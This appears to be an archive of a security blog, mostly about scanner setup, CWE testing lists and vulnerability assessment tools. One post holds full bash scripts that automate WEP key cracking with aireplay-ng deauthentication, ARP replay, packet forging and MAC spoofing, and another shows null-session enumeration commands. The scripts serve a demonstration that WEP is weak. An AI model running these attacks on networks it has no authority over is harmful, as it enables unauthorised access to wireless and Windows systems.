
20 Apr 2016

Adding free security plugins in Eclipse

Install Plugins

Install FindBugs and SonarLint by performing these steps:
  • Start Eclipse
  • Menu Help / Eclipse Marketplace
  • Search for FindBugs, install it.
  • Search for SonarLint for Eclipse, choose the optional Java Configuration Helper and install it

Add the Find Security Bugs plugin for FindBugs:
  • Download the plugin jar file from http://find-sec-bugs.github.io
  • Click Window -> Preferences then go to Java -> FindBugs
  • Open Plugins and misc. Settings tab and click Add to add the Find Security Bugs plugin jar file to the list
  • Restart Eclipse

Enable analysis

For each project you have in Eclipse:
  • Right-click on it and click the menu Configure / Enable SonarLint
Note that FindBugs is already usable after installation, so there is no need to enable it for each project.

Using Findbugs

  • Right-click on the project in Eclipse and select the menu Find Bugs / Find Bugs
  • Wait for the analysis to complete - a popup dialog will open, show progress and then close automatically.
  • Open the Bug Explorer. The first time, you will need to select the Eclipse menu Window / Show View / Other / FindBugs / Bug Explorer

Using SonarLint

  • Right-click on the project in Eclipse and select the menu SonarLint / Analyze all files
  • View the progress in the Eclipse Console
  • View the Sonar markers in your source code.
  • Occasionally update your analyzers via Help / Update SonarLint Analyzers

For a quick intro, see the SonarLint for Eclipse web page.

17 Jan 2016

CWEs to test manually

Vulnerabilities that scanners don't (always) find reliably and that warrant a manual test (after the scan):
  • CWE-285 Improper Access Control (Authorization)
  • CWE-306 Missing Authentication for Critical Function
  • CWE-311 Missing Encryption of Sensitive Data [A06]
  • CWE-352 Cross-Site Request Forgery (CSRF) [A08]
  • CWE-434 Unrestricted Upload of File with Dangerous Type
  • CWE-798 Use of Hard-coded Credentials  
  • CWE-840 Business Logic Errors
OWASP Top 10 (2013)
  • A02 Broken Authentication and Session Management
  • A04 Insecure Direct Object References
  • A05 Security Misconfiguration
  • A06 Sensitive Data Exposure
  • A08 Cross-Site Request Forgery (CSRF)
  • A10 Unvalidated Redirects and Forwards
Those that are less broadly applicable, or less testable via black-box methods:
  • CWE-494 Download of Code Without Integrity Check
  • CWE-732 Incorrect Permission Assignment for Critical Resource
  • CWE-754 Improper Check for Unusual or Exceptional Conditions
  • CWE-770 Allocation of Resources Without Limits or Throttling 
  • CWE-807 Reliance on Untrusted Inputs in a Security Decision
  • [...]
Of course, this is just a generic list. We still need to adapt our approach to the context, validate the findings from scanners (identify false positives, adjust severity/priority based on exposure), try to exploit recent vulnerabilities, try new techniques, etc.

12 Nov 2013

Scanning sites protected against CSRF attacks

To allow scanning of sites protected against Cross-Site Request Forgery (CSRF) attacks, a Burp plugin was developed (proof of concept). It can be found here: http://code.google.com/p/pysqlin/downloads/list.

Taken from an article on http://edge-security.blogspot.ca:
In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially as each request contains a newly generated anti-CSRF token needed for the next request, forming a token chain.

A POC in the form of a Burp suite plugin has been developed to verify this approach; it can be downloaded at http://code.google.com/p/pysqlin/downloads/list. It should be noted however that this code is a POC and it requires further development in order to be able to work against real environments (any link of a webapp with this behavior is appreciated).

Original post: http://edge-security.blogspot.ca.
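The token chain described above, as an added example that is not from the original post or the Burp POC: a constructed Python stand-in for an application that rotates its anti-CSRF token on every response, scanned once by a client that reuses a single token (what parallel scanning amounts to) and once by a client that feeds each response's token into the next request. The application, token format and regex are assumptions for the simulation.

```python
import re
import secrets


class CsrfProtectedApp:
    """Constructed stand-in for an app that rotates its anti-CSRF token on every response."""

    def __init__(self):
        self._token = secrets.token_hex(8)
        self.accepted = []  # actions the application actually processed

    def _page(self, status):
        # every rendered page embeds the token that the *next* request must carry
        html = f'<form><input type="hidden" name="csrf_token" value="{self._token}"></form>'
        return status, html

    def get(self):
        return self._page(200)

    def post(self, action, token):
        if token != self._token:
            return self._page(403)  # stale or missing token: rejected, token unchanged
        self.accepted.append(action)
        self._token = secrets.token_hex(8)  # rotate: the token just used is now dead
        return self._page(200)


# Assumed markup of the hidden field; a real target's field name/format would differ.
TOKEN_RE = re.compile(r'name="csrf_token"\s+value="([0-9a-f]+)"')


def extract_token(html):
    """Pull the anti-CSRF token out of a response body."""
    match = TOKEN_RE.search(html)
    if not match:
        raise ValueError("no anti-CSRF token in response")
    return match.group(1)


def scan_with_fixed_token(app, actions):
    """Naive scanner: fetches one token and reuses it for every request."""
    _, html = app.get()
    token = extract_token(html)
    return [app.post(action, token)[0] for action in actions]


def scan_token_chain(app, actions):
    """Sequential scanner: the token from each response is fed into the next request."""
    _, html = app.get()
    token = extract_token(html)
    statuses = []
    for action in actions:
        status, html = app.post(action, token)
        statuses.append(status)
        token = extract_token(html)  # the link in the chain
    return statuses


if __name__ == "__main__":
    print("fixed token:", scan_with_fixed_token(CsrfProtectedApp(), ["a", "b", "c"]))
    print("token chain:", scan_token_chain(CsrfProtectedApp(), ["a", "b", "c"]))
```

Only the first request of the fixed-token run is accepted; every request of the chained run is, which is why such a scan cannot be parallelised across requests that share a token.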

7 Aug 2012

Configuring Nessus for web application scans

When using Nessus to scan a website, it is important to configure the global settings properly in order to find as many vulnerabilities as possible.
Tenable's support site has a good article that explains how. I have copied the details below.

Summary:
  • Cookies can be imported to make pre-authenticated access easier
  • To obtain a file containing live cookies, use Firefox and export its cookies with an add-on such as Export Cookies
  • It is also very important to adjust a few settings in Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, add scan starting points under Web Mirroring (+ use plugins that rely on these settings)

Problem:

What needs to be configured to ensure a thorough web application audit is performed by Nessus?

Solution:

Tenable encourages users to run a full vulnerability scan with all plugins enabled. If you want to streamline a policy to only focus on a web application, the following steps outline the process for creating a new policy designed to run a web application audit:
  1. Create a new policy. (Policies -> Add)
  2. Under the “General” tab options, set up a scan as you normally would. Ensure at least one TCP-based port scanner is selected and provide a list of ports with web servers running on the host(s). Note: Only use this method if you are absolutely sure you know of all web servers running on the targets. Otherwise, select a port range so that Nessus can detect web servers and applications to audit.
  3. Under the “Plugins” tab, ensure the following plugin families are enabled:
    1. CGI abuses – This plugin family checks for a wide range of commercial and open source applications that have documented vulnerabilities. These checks include software detection, information disclosure, SQL injection, file inclusion, overflows and more.
    2. CGI abuses : XSS – This plugin family checks for a wide range of commercial and open source applications that have documented Cross-site Scripting (XSS) vulnerabilities.
    3. Database – Many web applications will utilize a database for storing large amounts of data. SQL injection attacks are designed to target database servers via web applications.
    4. FTP – Some sites use FTP for administrators to upload web application content or update the application.
    5. General – This plugin family contains plugins that identify operating systems via HTTP, perform a wide variety of SSL checks and more.
    6. Service detection – Contains checks for a wide variety of services and technologies, many of which support web servers and applications.
    7. Web servers – This plugin family contains over 500 checks for vulnerabilities in popular web servers including Apache, Tomcat, IIS and WebSphere. In addition, this plugin family includes checks for frameworks such as PHP, common web server issues associated with the HTTP(S) protocol, OpenSSL checks and more.
  4. Under the “Preferences” tab, there are several drop-down menus with additional configuration options that must be specified:
    1. Under “Global variable settings”, select “Enable CGI scanning”. Optionally, the “Thorough tests (slow)” can be enabled and “Report verbosity” can be set to “Verbose” to provide additional vulnerability checks and better reporting.
    2. The “HTTP cookies import” drop-down can be used to import cookies as a means for authenticating to the application. This is not explicitly required, but some means of authentication should be provided.
    3. The “HTTP login page” drop-down provides over a dozen options that direct Nessus to a custom web application. This includes the URL to the login page (e.g., /application/login.php), login form (i.e., if the login data is sent to a different location), relevant form fields for authentication (the “user” and “pass” variables should be changed to reflect your application, %USER% and %PASS% are pulled from the “Login configurations” drop-down menu) and options that control how Nessus behaves in relation to the authentication process.
    4. The “Login configurations” can be used if the application is protected using HTTP Basic Authentication, Digest or NTLM.
    5. The “Web Application Tests Settings” drop-down contains several important options for enabling testing of custom applications. The “Enable web applications tests” must be enabled, or Nessus will only scan for known vulnerabilities based on prior public disclosures. This page also contains options for limiting the time to test an application, use of POST requests, the type of argument values to use (refer to the Nessus User Guide for additional information on this option) and more.
    6. The “Web mirroring” drop-down directs Nessus’ behavior for mirroring the application, a step performed before tests are calculated and run. The total number of pages or depth of mirroring can be controlled, along with the starting page and a delimited list of regular expressions that are used to match web pages that Nessus will exclude (e.g., logout|emailus.php).
For more information about the settings you can watch our instructional videos at:
http://www.youtube.com/watch?v=fUCgvZnTILo
http://www.youtube.com/watch?v=B5qvVT9iho0
Additionally, you can find detailed information on the preferences in the Nessus User Guide.
Other Refs:
  • From the Discussions Forum, another related post regarding the use of cookie importing: https://discussions.nessus.org/thread/4395
  • The missing link in the Nessus docs is that to get the cookie file, you need to use Firefox and export using an add-on such as: https://addons.mozilla.org/en-US/firefox/addon/export-cookies/?src=api
  • Also very important is to tweak a few settings in Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, Web Mirroring starting points (+ choose some plugins that use these)

12 Jan 2012

Nessus, IID & botnet detection

Brought to you by Tenable…
Nessus uses data provided by Internet Identity IID, a company that maintains a list of hosts it has determined through various technical means are part of a botnet. Nessus does not perform the technical checks itself; rather it compares the IP addresses being scanned against a list maintained by IID. Inclusion in IID’s list is typically accurate; they experience a very low rate of false positives.
If a host is reported as part of a botnet, there are several things you can do to help validate the finding and respond to the issue:
  1. Check the host against additional third-party lists to determine if the host shows up in those resources: http://isc.sans.edu/sources.html, http://www.malwaredomains.com, http://www.ipvoid.com
  2. Check the host against known Unsolicited Bulk E-mail UBE/spam blacklists: http://www.dmoz.org/Computers/Internet/E-mail/Spam/Blacklists
  3. Look for any evidence of the host being compromised, e.g., suspicious activity, newly installed software, machine resources being heavily utilized.
  4. Perform a full vulnerability scan to determine if any high-risk or critical vulnerabilities are present, that may represent the point of intrusion. Ensure web application auditing is enabled, as Nessus can identify malicious web content related to botnet activities.
  5. Move the host to an isolated network and use a network sniffer to monitor traffic being sent from the machine.
If you still have questions about your host appearing in the list, you can contact IID at activeknowledge.signals.requests@internetidentity.com with questions. Your initial mail should include the IP address in question, when the IP was reported (i.e., when you ran your Nessus scan) and any additional information about the host that may be relevant.

via Tenable Customer Support Portal (for registered users).

18 Nov 2011

Tenable Security Center and sqlite

Tenable Security Center uses an sqlite database. Here are a few commands that help extract data from the Security Center database files, using the sqlite3 command…

# cd /opt/sc4
# /opt/sc4/support/bin/sqlite3 application.db ".tables"
AcceptRiskRules                   AppStyle
AdminDashboardTab                 AppStyleAttribute
AdminPreferences                  AppStyleFamily
AdminUser                         AppStyleFamilyMapping
AppAuditFile                      AppWindowsCredential
AppAuditFilePlugins               AssetTemplate
AppCredential                     AssetTemplateClause
AppDashboardComponent             AssetTemplateClauseGroup
AppDashboardTab                   Configuration
AppDataTimestamps                 CorrelatedRepositoryLCE
AppKerberosCredential             Email
AppPolicy                         LCE
AppPolicyAuditFile                LCESilo
AppPolicyDisabledPlugins          LCETypes
AppPolicyEnabledPlugins           OrgLCE
AppPolicyFamily                   OrgRepository
AppPolicyPluginPrefs              Organization
AppPolicyTemplate                 PassiveScanner
AppPolicyTemplateAuditFile        PassiveScannerRepository
AppPolicyTemplateDisabledPlugins  RecastRiskRules
AppPolicyTemplateEnabledPlugins   Repository
AppPolicyTemplateFamily           Scanner
AppPolicyTemplatePluginPrefs      UserAuth
AppReportTemplate                 Zone
AppRole                           ZoneOrganization
AppSNMPCredential                 ZoneScanner
AppSSHCredential                  sc4Schema
AppSchedule

# /opt/sc4/support/bin/sqlite3 jobqueue.db ".tables"
JobQueue   sc4Schema

# /opt/sc4/support/bin/sqlite3 application.db "SELECT * FROM Configuration"
[...]
# /opt/sc4/support/bin/sqlite3 application.db ".schema"
[...]
CREATE TABLE [Configuration] (
[type] INTEGER,
[name] VARCHAR NOT NULL,
[value] VARCHAR NOT NULL,
[visible] BOOLEAN NOT NULL DEFAULT 'true'
, [editable] BOOLEAN NOT NULL DEFAULT 'true');
CREATE TABLE [CorrelatedRepositoryLCE] (
[repID] INTEGER NOT NULL,
[lceID] INTEGER NOT NULL
);
[...]
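The same extraction from Python, as an added example that is not part of the original post or of a Tenable tool: it opens the database with mode=ro so a support query can never modify the live Security Center file, lists tables from sqlite_master like .tables does, and dumps a table only after checking the name against the catalogue (table names cannot be bound as query parameters). The schema is copied from the Configuration fragment above; the rows and setting names are constructed placeholders.

```python
import os
import sqlite3
import tempfile

# Schema taken from the application.db fragment shown above (two tables only).
SC_SCHEMA = """
CREATE TABLE [Configuration] (
  [type] INTEGER,
  [name] VARCHAR NOT NULL,
  [value] VARCHAR NOT NULL,
  [visible] BOOLEAN NOT NULL DEFAULT 'true',
  [editable] BOOLEAN NOT NULL DEFAULT 'true');
CREATE TABLE [CorrelatedRepositoryLCE] (
  [repID] INTEGER NOT NULL,
  [lceID] INTEGER NOT NULL);
"""

# Constructed sample rows: placeholder names, not real Security Center settings.
SAMPLE_CONFIG_ROWS = [
    (1, "PLACEHOLDER_SETTING_A", "enabled", "true", "true"),
    (1, "PLACEHOLDER_SETTING_B", "30", "false", "false"),
]


def open_readonly(path):
    """Open an existing SQLite file so that any write attempt fails (URI mode=ro)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def list_tables(conn):
    """Equivalent of the sqlite3 shell's .tables, read from the catalogue."""
    cur = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")
    return [row[0] for row in cur]


def dump_table(conn, table):
    """Return (column names, rows) for one table.

    Identifiers cannot be bound with '?', so the name is validated against
    sqlite_master before it is interpolated into the statement.
    """
    if table not in list_tables(conn):
        raise ValueError(f"unknown table: {table!r}")
    cur = conn.execute(f'SELECT * FROM "{table}"')
    columns = [d[0] for d in cur.description]
    return columns, cur.fetchall()


def write_is_rejected(conn):
    """True when the connection refuses an INSERT, i.e. it really is read-only."""
    try:
        conn.execute("INSERT INTO CorrelatedRepositoryLCE (repID, lceID) VALUES (1, 1)")
        conn.rollback()
        return False
    except sqlite3.OperationalError:
        return True


def make_sample_db():
    """Create a throwaway application.db look-alike on disk and return its path."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    conn = sqlite3.connect(path)
    conn.executescript(SC_SCHEMA)
    conn.executemany(
        "INSERT INTO Configuration (type, name, value, visible, editable) VALUES (?, ?, ?, ?, ?)",
        SAMPLE_CONFIG_ROWS,
    )
    conn.commit()
    conn.close()
    return path


if __name__ == "__main__":
    # On a real system, point open_readonly at /opt/sc4/application.db instead.
    db = open_readonly(make_sample_db())
    print(list_tables(db))
    columns, rows = dump_table(db, "Configuration")
    print(columns)
    for row in rows:
        print(row)
```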

6 Oct 2009

Hackerdemia Disk Information and Download Link

The following is a direct excerpt from the heorot forum.

Get the current Hackerdemia PenTest Tool Tutorial disk

The MD5 Hash Value: 09e960360714df7879679dee72ce5733

How to start the disk:
Boot the LiveCD on a system within your pentest lab, which needs to be configured to be in the 192.168.xxx.xxx range.
Connect to http://192.168.1.123 using a web browser (preferably in BackTrack or your favorite pentest platform)

You will be presented with a web page, which is your tutorials. All hands-on examples were created with the Hackerdemia disk as the target, so your results should exactly match those found in the tutorials.

Where to get the BackTrack disk:
http://remote-exploit.org/backtrack_download.html

Network configuration:
The LiveCD configures itself to an IP address of 192.168.1.123 by default. If you want to change it, simply log in as:
username: root
password: toor

...and change the ifconfig information (If you don't know what I'm talking about, go to: http://en.wikipedia.org/wiki/Ifconfig )

See also:
http://heorot.net/instruction/tutorials/iso/hackerdemia-1.1.0.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso

Conficker Eye Chart

The Conficker Eye Chart helps end-users determine if they are infected with Conficker. If indeed you are infected, please make sure that you remove it properly. This may mean reinstallation but before you do that, visit the repair tools list. Actually, here's an even bigger list.

29 Sept 2009

Vulnerability assessment tools

Application Security DbProtect [$30,000 for 5 DB]
Enterprise-class database security, risk and compliance suite. It combines discovery, vulnerability scanning, real-time activity monitoring, auditing and intrusion detection to help organizations reduce risk and enhance compliance throughout their database infrastructure. This product can protect databases from internal and external threats, as well as ensuring regulatory compliance. SC Review

Auditor Assuria
[$3,800 starter pack: central software + 5 agents]
Security and compliance scanner for enterprise servers. This product features capabilities, such as vulnerability assessment, system change detection, system information and regulatory compliance. The Auditor can actively scan systems using agents deployed across the enterprise network, and these agents report back to the main console. SC Review

Cenzic Hailstorm ARC [$26,000]
Web application vulnerability scanner. This product can scan websites and web applications in the enterprise to see how vulnerable they are to possible attack from hackers. This application can also go above and beyond standard scanning by providing complete risk analysis and compliance checks as well. SC Review

Core Security Technologies Core Impact Pro 8 [$30,000/year]
One of our favorite tools is back this year and it's better than ever. Core Impact Pro 8 is the ultimate tool in vulnerability assessment and penetration testing. It provides a comprehensive suite of features gathered in one place. This product can be used to scan and exploit systems using multiple modules for information gathering, exploitation, local information gathering, privilege escalation, pivoting, and clean-up and reporting. This tool also deploys agents that run in the target's memory if a target can be exploited. SC Review

eEye Digital Security Retina [$575 for 32 IPs]
Multi-platform vulnerability management. Retina identifies known and zero-day vulnerabilities and provides security risk assessment, enabling security best practices, policy enforcement and compliance with regulatory audits. This product analyzes specific pieces of the operating system, applications and policies. The tool targets high-risk host components and how a cybercriminal could potentially leverage them for malicious activity. SC Review

GFI LANguard [10-24 IPs at $32/IP]
Vulnerability assessment engine able to discover more than 15,000 vulnerabilities, including Microsoft missing patches in various languages. This product can scan and discover vulnerabilities across the network. It uses an update engine, which runs in real time and synchronizes the local vulnerability database with the latest releases from Microsoft, CVE, OVAL and SANS. SC Review

IBM ISS Network Enterprise Scanner [$7,250]
Proactive tool that accelerates time to risk reduction by prioritizing vulnerability remediation tasks. It eliminates manual steps by allowing continuous automated scanning across multiple network segments from a single appliance. It helps you leverage existing investments and decrease the cost of ownership through IT system integration (ISS SiteProtector, Virtual Patching). It helps identify existing IT risks and enables you to observe due diligence in conforming to regulatory requirements. CC Eval. CVE Support.

IBM Rational AppScan [starts at $17,500]
Protects against the threat of attacks and data breaches. Web application security, including new Malware detection capabilities, can be used for vulnerability scanning in all stages of application development and by testers with or without security expertise. SC Review.

McAfee Vulnerability Manager [$16,820 for 1,000 IP addresses]
Network vulnerability scanner and network auditing tool. This appliance can actively discover and scan network assets across the enterprise looking for possible threats that leave these assets vulnerable to attack. Vulnerability Manager does this using its very versatile scanning engine. SC Review

netVigilance SecureScout NX [$595]
Network vulnerability scanning tool that at first glance looks like a scanning tool from times past. However, this product packs a serious punch. The SecureScout can scan almost anything that has an IP address - be it firewalls, routers, operating systems or anything else you can find to throw at it. The tool can also do in-depth firewall testing and scan multiple subnets from one console. SC Review

N-Stalker Web Application Security Scanner [$1,399/URL, $6,299 unlimited]
Assesses a web application against a wide range of vulnerabilities, including the application layer and infrastructure layer. Scans for the application layer are based on the Open Web Application Security Project (OWASP) Top 10 and Common Weakness Enumeration (CWE) Top 25. Scans against the infrastructure layer include more than 35,000 signatures for server and third-party packages. SC Review

Ounce Labs Ounce 6 [$30,000]
Static source code security analysis. It will analyze any application written in C/C++, Java/JSP, .NET (C#, VB .NET, ASP.NET), Classic ASP (VBScript, JavaScript) and Visual Basic 6. This product provides a way to carefully examine any source code written in these languages for possible holes and vulnerabilities. These applications do not need to be web-based. Any source code can be tested. SC Review

Saint Saint Suite [$2,695 for a Class C]
Vulnerability scanning across a vast number of platforms, routers and basically anything else with an IP address. It can also try to exploit and penetrate those vulnerabilities using a penetration tool. This provides an all-around overview of network vulnerabilities. SC Review

Sunbelt Software Network Security Inspector
[$795-$3,495 based on employee size]
Network vulnerability scanner using a database of over 4,000 ranked multiplatform vulnerabilities. This product can perform comprehensive vulnerability assessment without causing interruptions to the machines being scanned. The tool not only detects vulnerabilities, but also shows how to remediate the threat by providing locations where, if any, applicable patches can be downloaded to fix the machine. SC Review


17 Jun 2009

WEP cracking POC with aircrack-ng

Below you'll find my WEP key cracking script crack.sh. I use it in parallel with my capture script cap.sh to demonstrate how easy it is to crack WEP. You'll need to create your own crack.conf file (after performing some reconnaissance with Kismet or airodump-ng) and then you'll see how easy it is to crack WEP.

So don't use WEP!

#!/bin/bash
# File: crack.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

# Check calling args
if [ $# -ne 1 ]
then
echo "Syntax: $0 CONFIGNAME"; exit 1
fi
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}'
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

# Enter network values here
CONFFILE=./crack.conf
if [ ! -r $CONFFILE ] # the config is sourced, so it only needs to be readable
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $1

msg 'Pls start the capture in a separate terminal'
prompt 'Run fake reauthentication? [y]'
if [ "$SEL" = y -o "$SEL" = "" ]
then
# Fake auth
aireplay-ng --fakeauth 0 -e "$essid" -a $bssid -h $mac0 $if
msg 'Check that association was successful'
fi

# Make choice of attack
prompt "Choose (0)deauth, (2)interactive-replay, (3)ARP-replay, (4)chopchop, (5)fragment:"
case $SEL in
0)
msg 'Will attempt deauthentication attack'
aireplay-ng -0 1 -a $bssid -h $mac1 $if
;;
2)
msg 'Will attempt replay attack interactively'
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid -h $mac0 $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
3)
# ARP request replay
msg 'Will run ARP replay'
aireplay-ng -3 -e "$essid" -b $bssid -h $mac0 $if
;;
4|5)
# Chop chop (or fragmentation) attack
msg 'Will run Chop chop: choose the one where dest. MAC is not FF:FF:FF:FF:FF:FF'
aireplay-ng --chopchop -e "$essid" -h $mac0 $if
#aireplay-ng -$SEL -e "$essid" -b $bssid $if
msg 'Now copy the .cap file name into your clipboard (without .cap)'
prompt 'Enter the base filename here:'
capfile=$SEL

# Dump the packet to the screen
msg 'Packets captured will be dumped to the screen'
tcpdump -s 0 -n -e -r $capfile.cap
msg 'Copy the srcIP to clipboard'
echo -n 'Copy the IP here: '; read srcIP
msg 'Copy the dstIP to clipboard'
echo -n 'Copy the IP here: '; read dstIP

# Forge ARP packet
msg 'Will forge ARP packet'
arpcapfile=$capfile-arp.cap # Output file for the forged ARP packet
packetforge-ng -0 -h $mac0 -c $mac1 -a $bssid -l $dstIP -k $srcIP -y $capfile.xor -w $arpcapfile

msg 'Will replay interactively from captured file (just select first shown)'
aireplay-ng --interactive -r $arpcapfile $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
esac
=============================================================

#!/bin/bash
# File: cap.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
opts=""

#######################################
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

usage(){
echo "Syntax: $0 (no args: interactive)"
echo " $0 IF -f CONFIGNAME [AIRODUMP-NG_OPTS]"
echo " $0 IF -c CHANNEL [AIRODUMP-NG_OPTS]"
}
#######################################
readConfig(){
CONFNAME=$1
shift

# Enter network values here
CONFFILE=./crack.conf
if [ ! -r $CONFFILE ] # the config is sourced, so it only needs to be readable
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $CONFNAME
opts="--bssid $bssid" # Filter APs by BSSID
opts="$opts -w $CONFNAME-ch$channel" # Dump file prefix
opts="$opts -t $type" # Filter APs by cipher suite
opts="$opts --band $band" # Band on which airodump-ng should hop (abg)
opts="$opts --channel $channel" # Capture on specific channels
opts="$opts $*"
}
#######################################
capture(){
#opts="$opts --ivs" # Save only captured IVs
#opts="$opts --gpsd" # Use GPSd
opts="$opts --update 2" # Display update delay in seconds
#opts="$opts --showack" # Prints ack/cts/rts statistics
#opts="$opts -h" # Hides known stations for --showack
#opts="$opts -f 1000" # Time in ms between hopping channels
opts="$opts -a" # Filter unassociated clients

if [ "$mac0" != "" ]
then
prompt "Change MAC to $mac0? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor $mac0
fi
else
prompt "Configure for $if for monitoring mode? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor
fi
fi
cmd="airodump-ng $opts $if"
msg "About to run: $cmd"
cd dump
$cmd

prompt "Configure $if back to normal managed mode? [n]"
if [ "$SEL" = "y" ]
then
cd ..
./wlanconfig.sh $if managed
fi
}
#######################################
interact(){
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

prompt "Use a known configuration? [n]"
if [ "$SEL" = "y" ]
then
prompt "Enter config name:"
readConfig $SEL
return
fi

prompt "Capture on a specific channel? [n]"
if [ "$SEL" = "y" ]
then
channel=1
prompt "Enter channel number: [$channel]"
if [ "$SEL" != "" ]
then
channel=$SEL
fi
opts="--channel $channel"
opts="$opts -w ch$channel" # Dump file prefix
fi
prompt "Filter on cipher (OPN|WEP|WPA|WPA1|WPA2)? [All]"
if [ "$SEL" != "" ]
then
opts="$opts -t $SEL"
fi
}
#######################################

# Check calling args
if [ $# -eq 1 ]
then
usage
exit 1
fi
if [ $# -ge 2 ]
then
if=$1 ; shift;
op=$1 ; shift
else
op=interactive
fi

case $op in
-c)
channel=$1
shift
opts="-w ch$channel" # Dump file prefix
opts="$opts -c $channel" # Capture on specific channels
opts="$opts $*"
capture
;;
-f)
readConfig $*
capture
;;
interact*)
interact $*
capture
;;
*)
usage
esac


=========================================================

#!/bin/bash
# File: wlanconfig.sh
PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin

printUsage(){
echo
echo "Usage: $0 IF MODE [NEWMAC]"
echo
echo "Examples:"
echo " $0 ath0 managed"
echo " $0 ath0 monitor"
echo " $0 wlan0 monitor"
echo " $0 wlan0 monitor 11:22:33:44:55:66"
echo
}

if [ $# -lt 2 ]
then
printUsage
exit 1
fi

case $2 in
managed)
mode=sta
;;
monitor)
mode=monitor
;;
*)
printUsage
exit 1
esac

if=$1
bif=$1
modecmd=$2
mac=$3

echo "-- Bringing $if down"
ifconfig $if down

# Set base interface to wifi0 if it's Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
bif=wifi0
fi

if [ "$mac" != "" ]
then
echo "-- Changing MAC of $bif to $mac"
macchanger --mac $mac $bif
fi

# Special execution for Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
echo "-- Destroying $if"
wlanconfig $if destroy

echo "-- Creating $if in $modecmd mode"
wlanconfig $if create wlandev $bif wlanmode $mode
else
#airmon-ng stop $if
#airmon-ng start $if
echo "-- Configuring $if for $modecmd mode"
iwconfig $if mode $modecmd
fi

echo "-- Bringing $if up"
ifconfig $if up

==============================================================

# File: Sample crack.conf
#if=wlan1 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)
#if=wifi0 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=ath1 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=wlan0 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)

case $1 in
*)
channel=6 # Wireless channel
essid="TESTSSID" # SSID
bssid=00:18:39:C4:F6:85 # MAC of AP
mac0=00:29:2F:E5:AA:15 # Masquerading as internal MAC (if required by AP)
mac1=00:1F:F3:F9:C1:B1 # MAC of known target
# key=C3E07361D029ACEE81234446B4 (saved here after cracking)
type=WEP
band=g
;;
esac

26 Nov 2008

Exploiting NULL session

With the PC firewall enabled:
C:\>nmap -sU -sA -p1-1000 192.168.10.165

Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-26 15:38 Eastern Standard Time

Interesting ports on 192.168.10.165:
Not shown: 1000 open|filtered ports, 997 filtered ports
PORT STATE SERVICE
135/tcp unfiltered msrpc
139/tcp unfiltered netbios-ssn
445/tcp unfiltered microsoft-ds
MAC Address: 00:1E:68:D5:58:72 (Quanta Computer)

Nmap done: 1 IP address (1 host up) scanned in 14.69 seconds
C:\>net use \\192.168.10.165\IPC$ "" /u:""
System error 53 has occurred.


Without the PC firewall:
C:\>nmap -sU -sS -p1-1000 192.168.10.165

Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-26 15:35 Eastern Standard Time

Interesting ports on 192.168.10.165:
Not shown: 1990 closed ports
PORT STATE SERVICE
9/tcp filtered discard
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
9/udp open|filtered discard
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
MAC Address: 00:1E:68:D5:58:72 (Quanta Computer)

Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds

C:\>net use \\192.168.10.165\IPC$ "" /u:""
The command completed successfully.

C:\>net view \\192.168.10.165
System error 5 has occurred.

Access is denied.

This probably means that the following registry value is set to 1:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous

If it's set to 0 (and no firewall), you get the following output instead:

Simple conversion of nmap output in XML to CSV using XSLT

Here's a simple nmap.xsl file to place in the same directory as the nmap XML output file:
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<!-- CSV is plain text, so use the text output method rather than html -->
<xsl:output method="text" encoding="UTF-8"/>
<xsl:template match="/nmaprun">host,protocol,port,service,state
<xsl:apply-templates select="host"/>
</xsl:template>
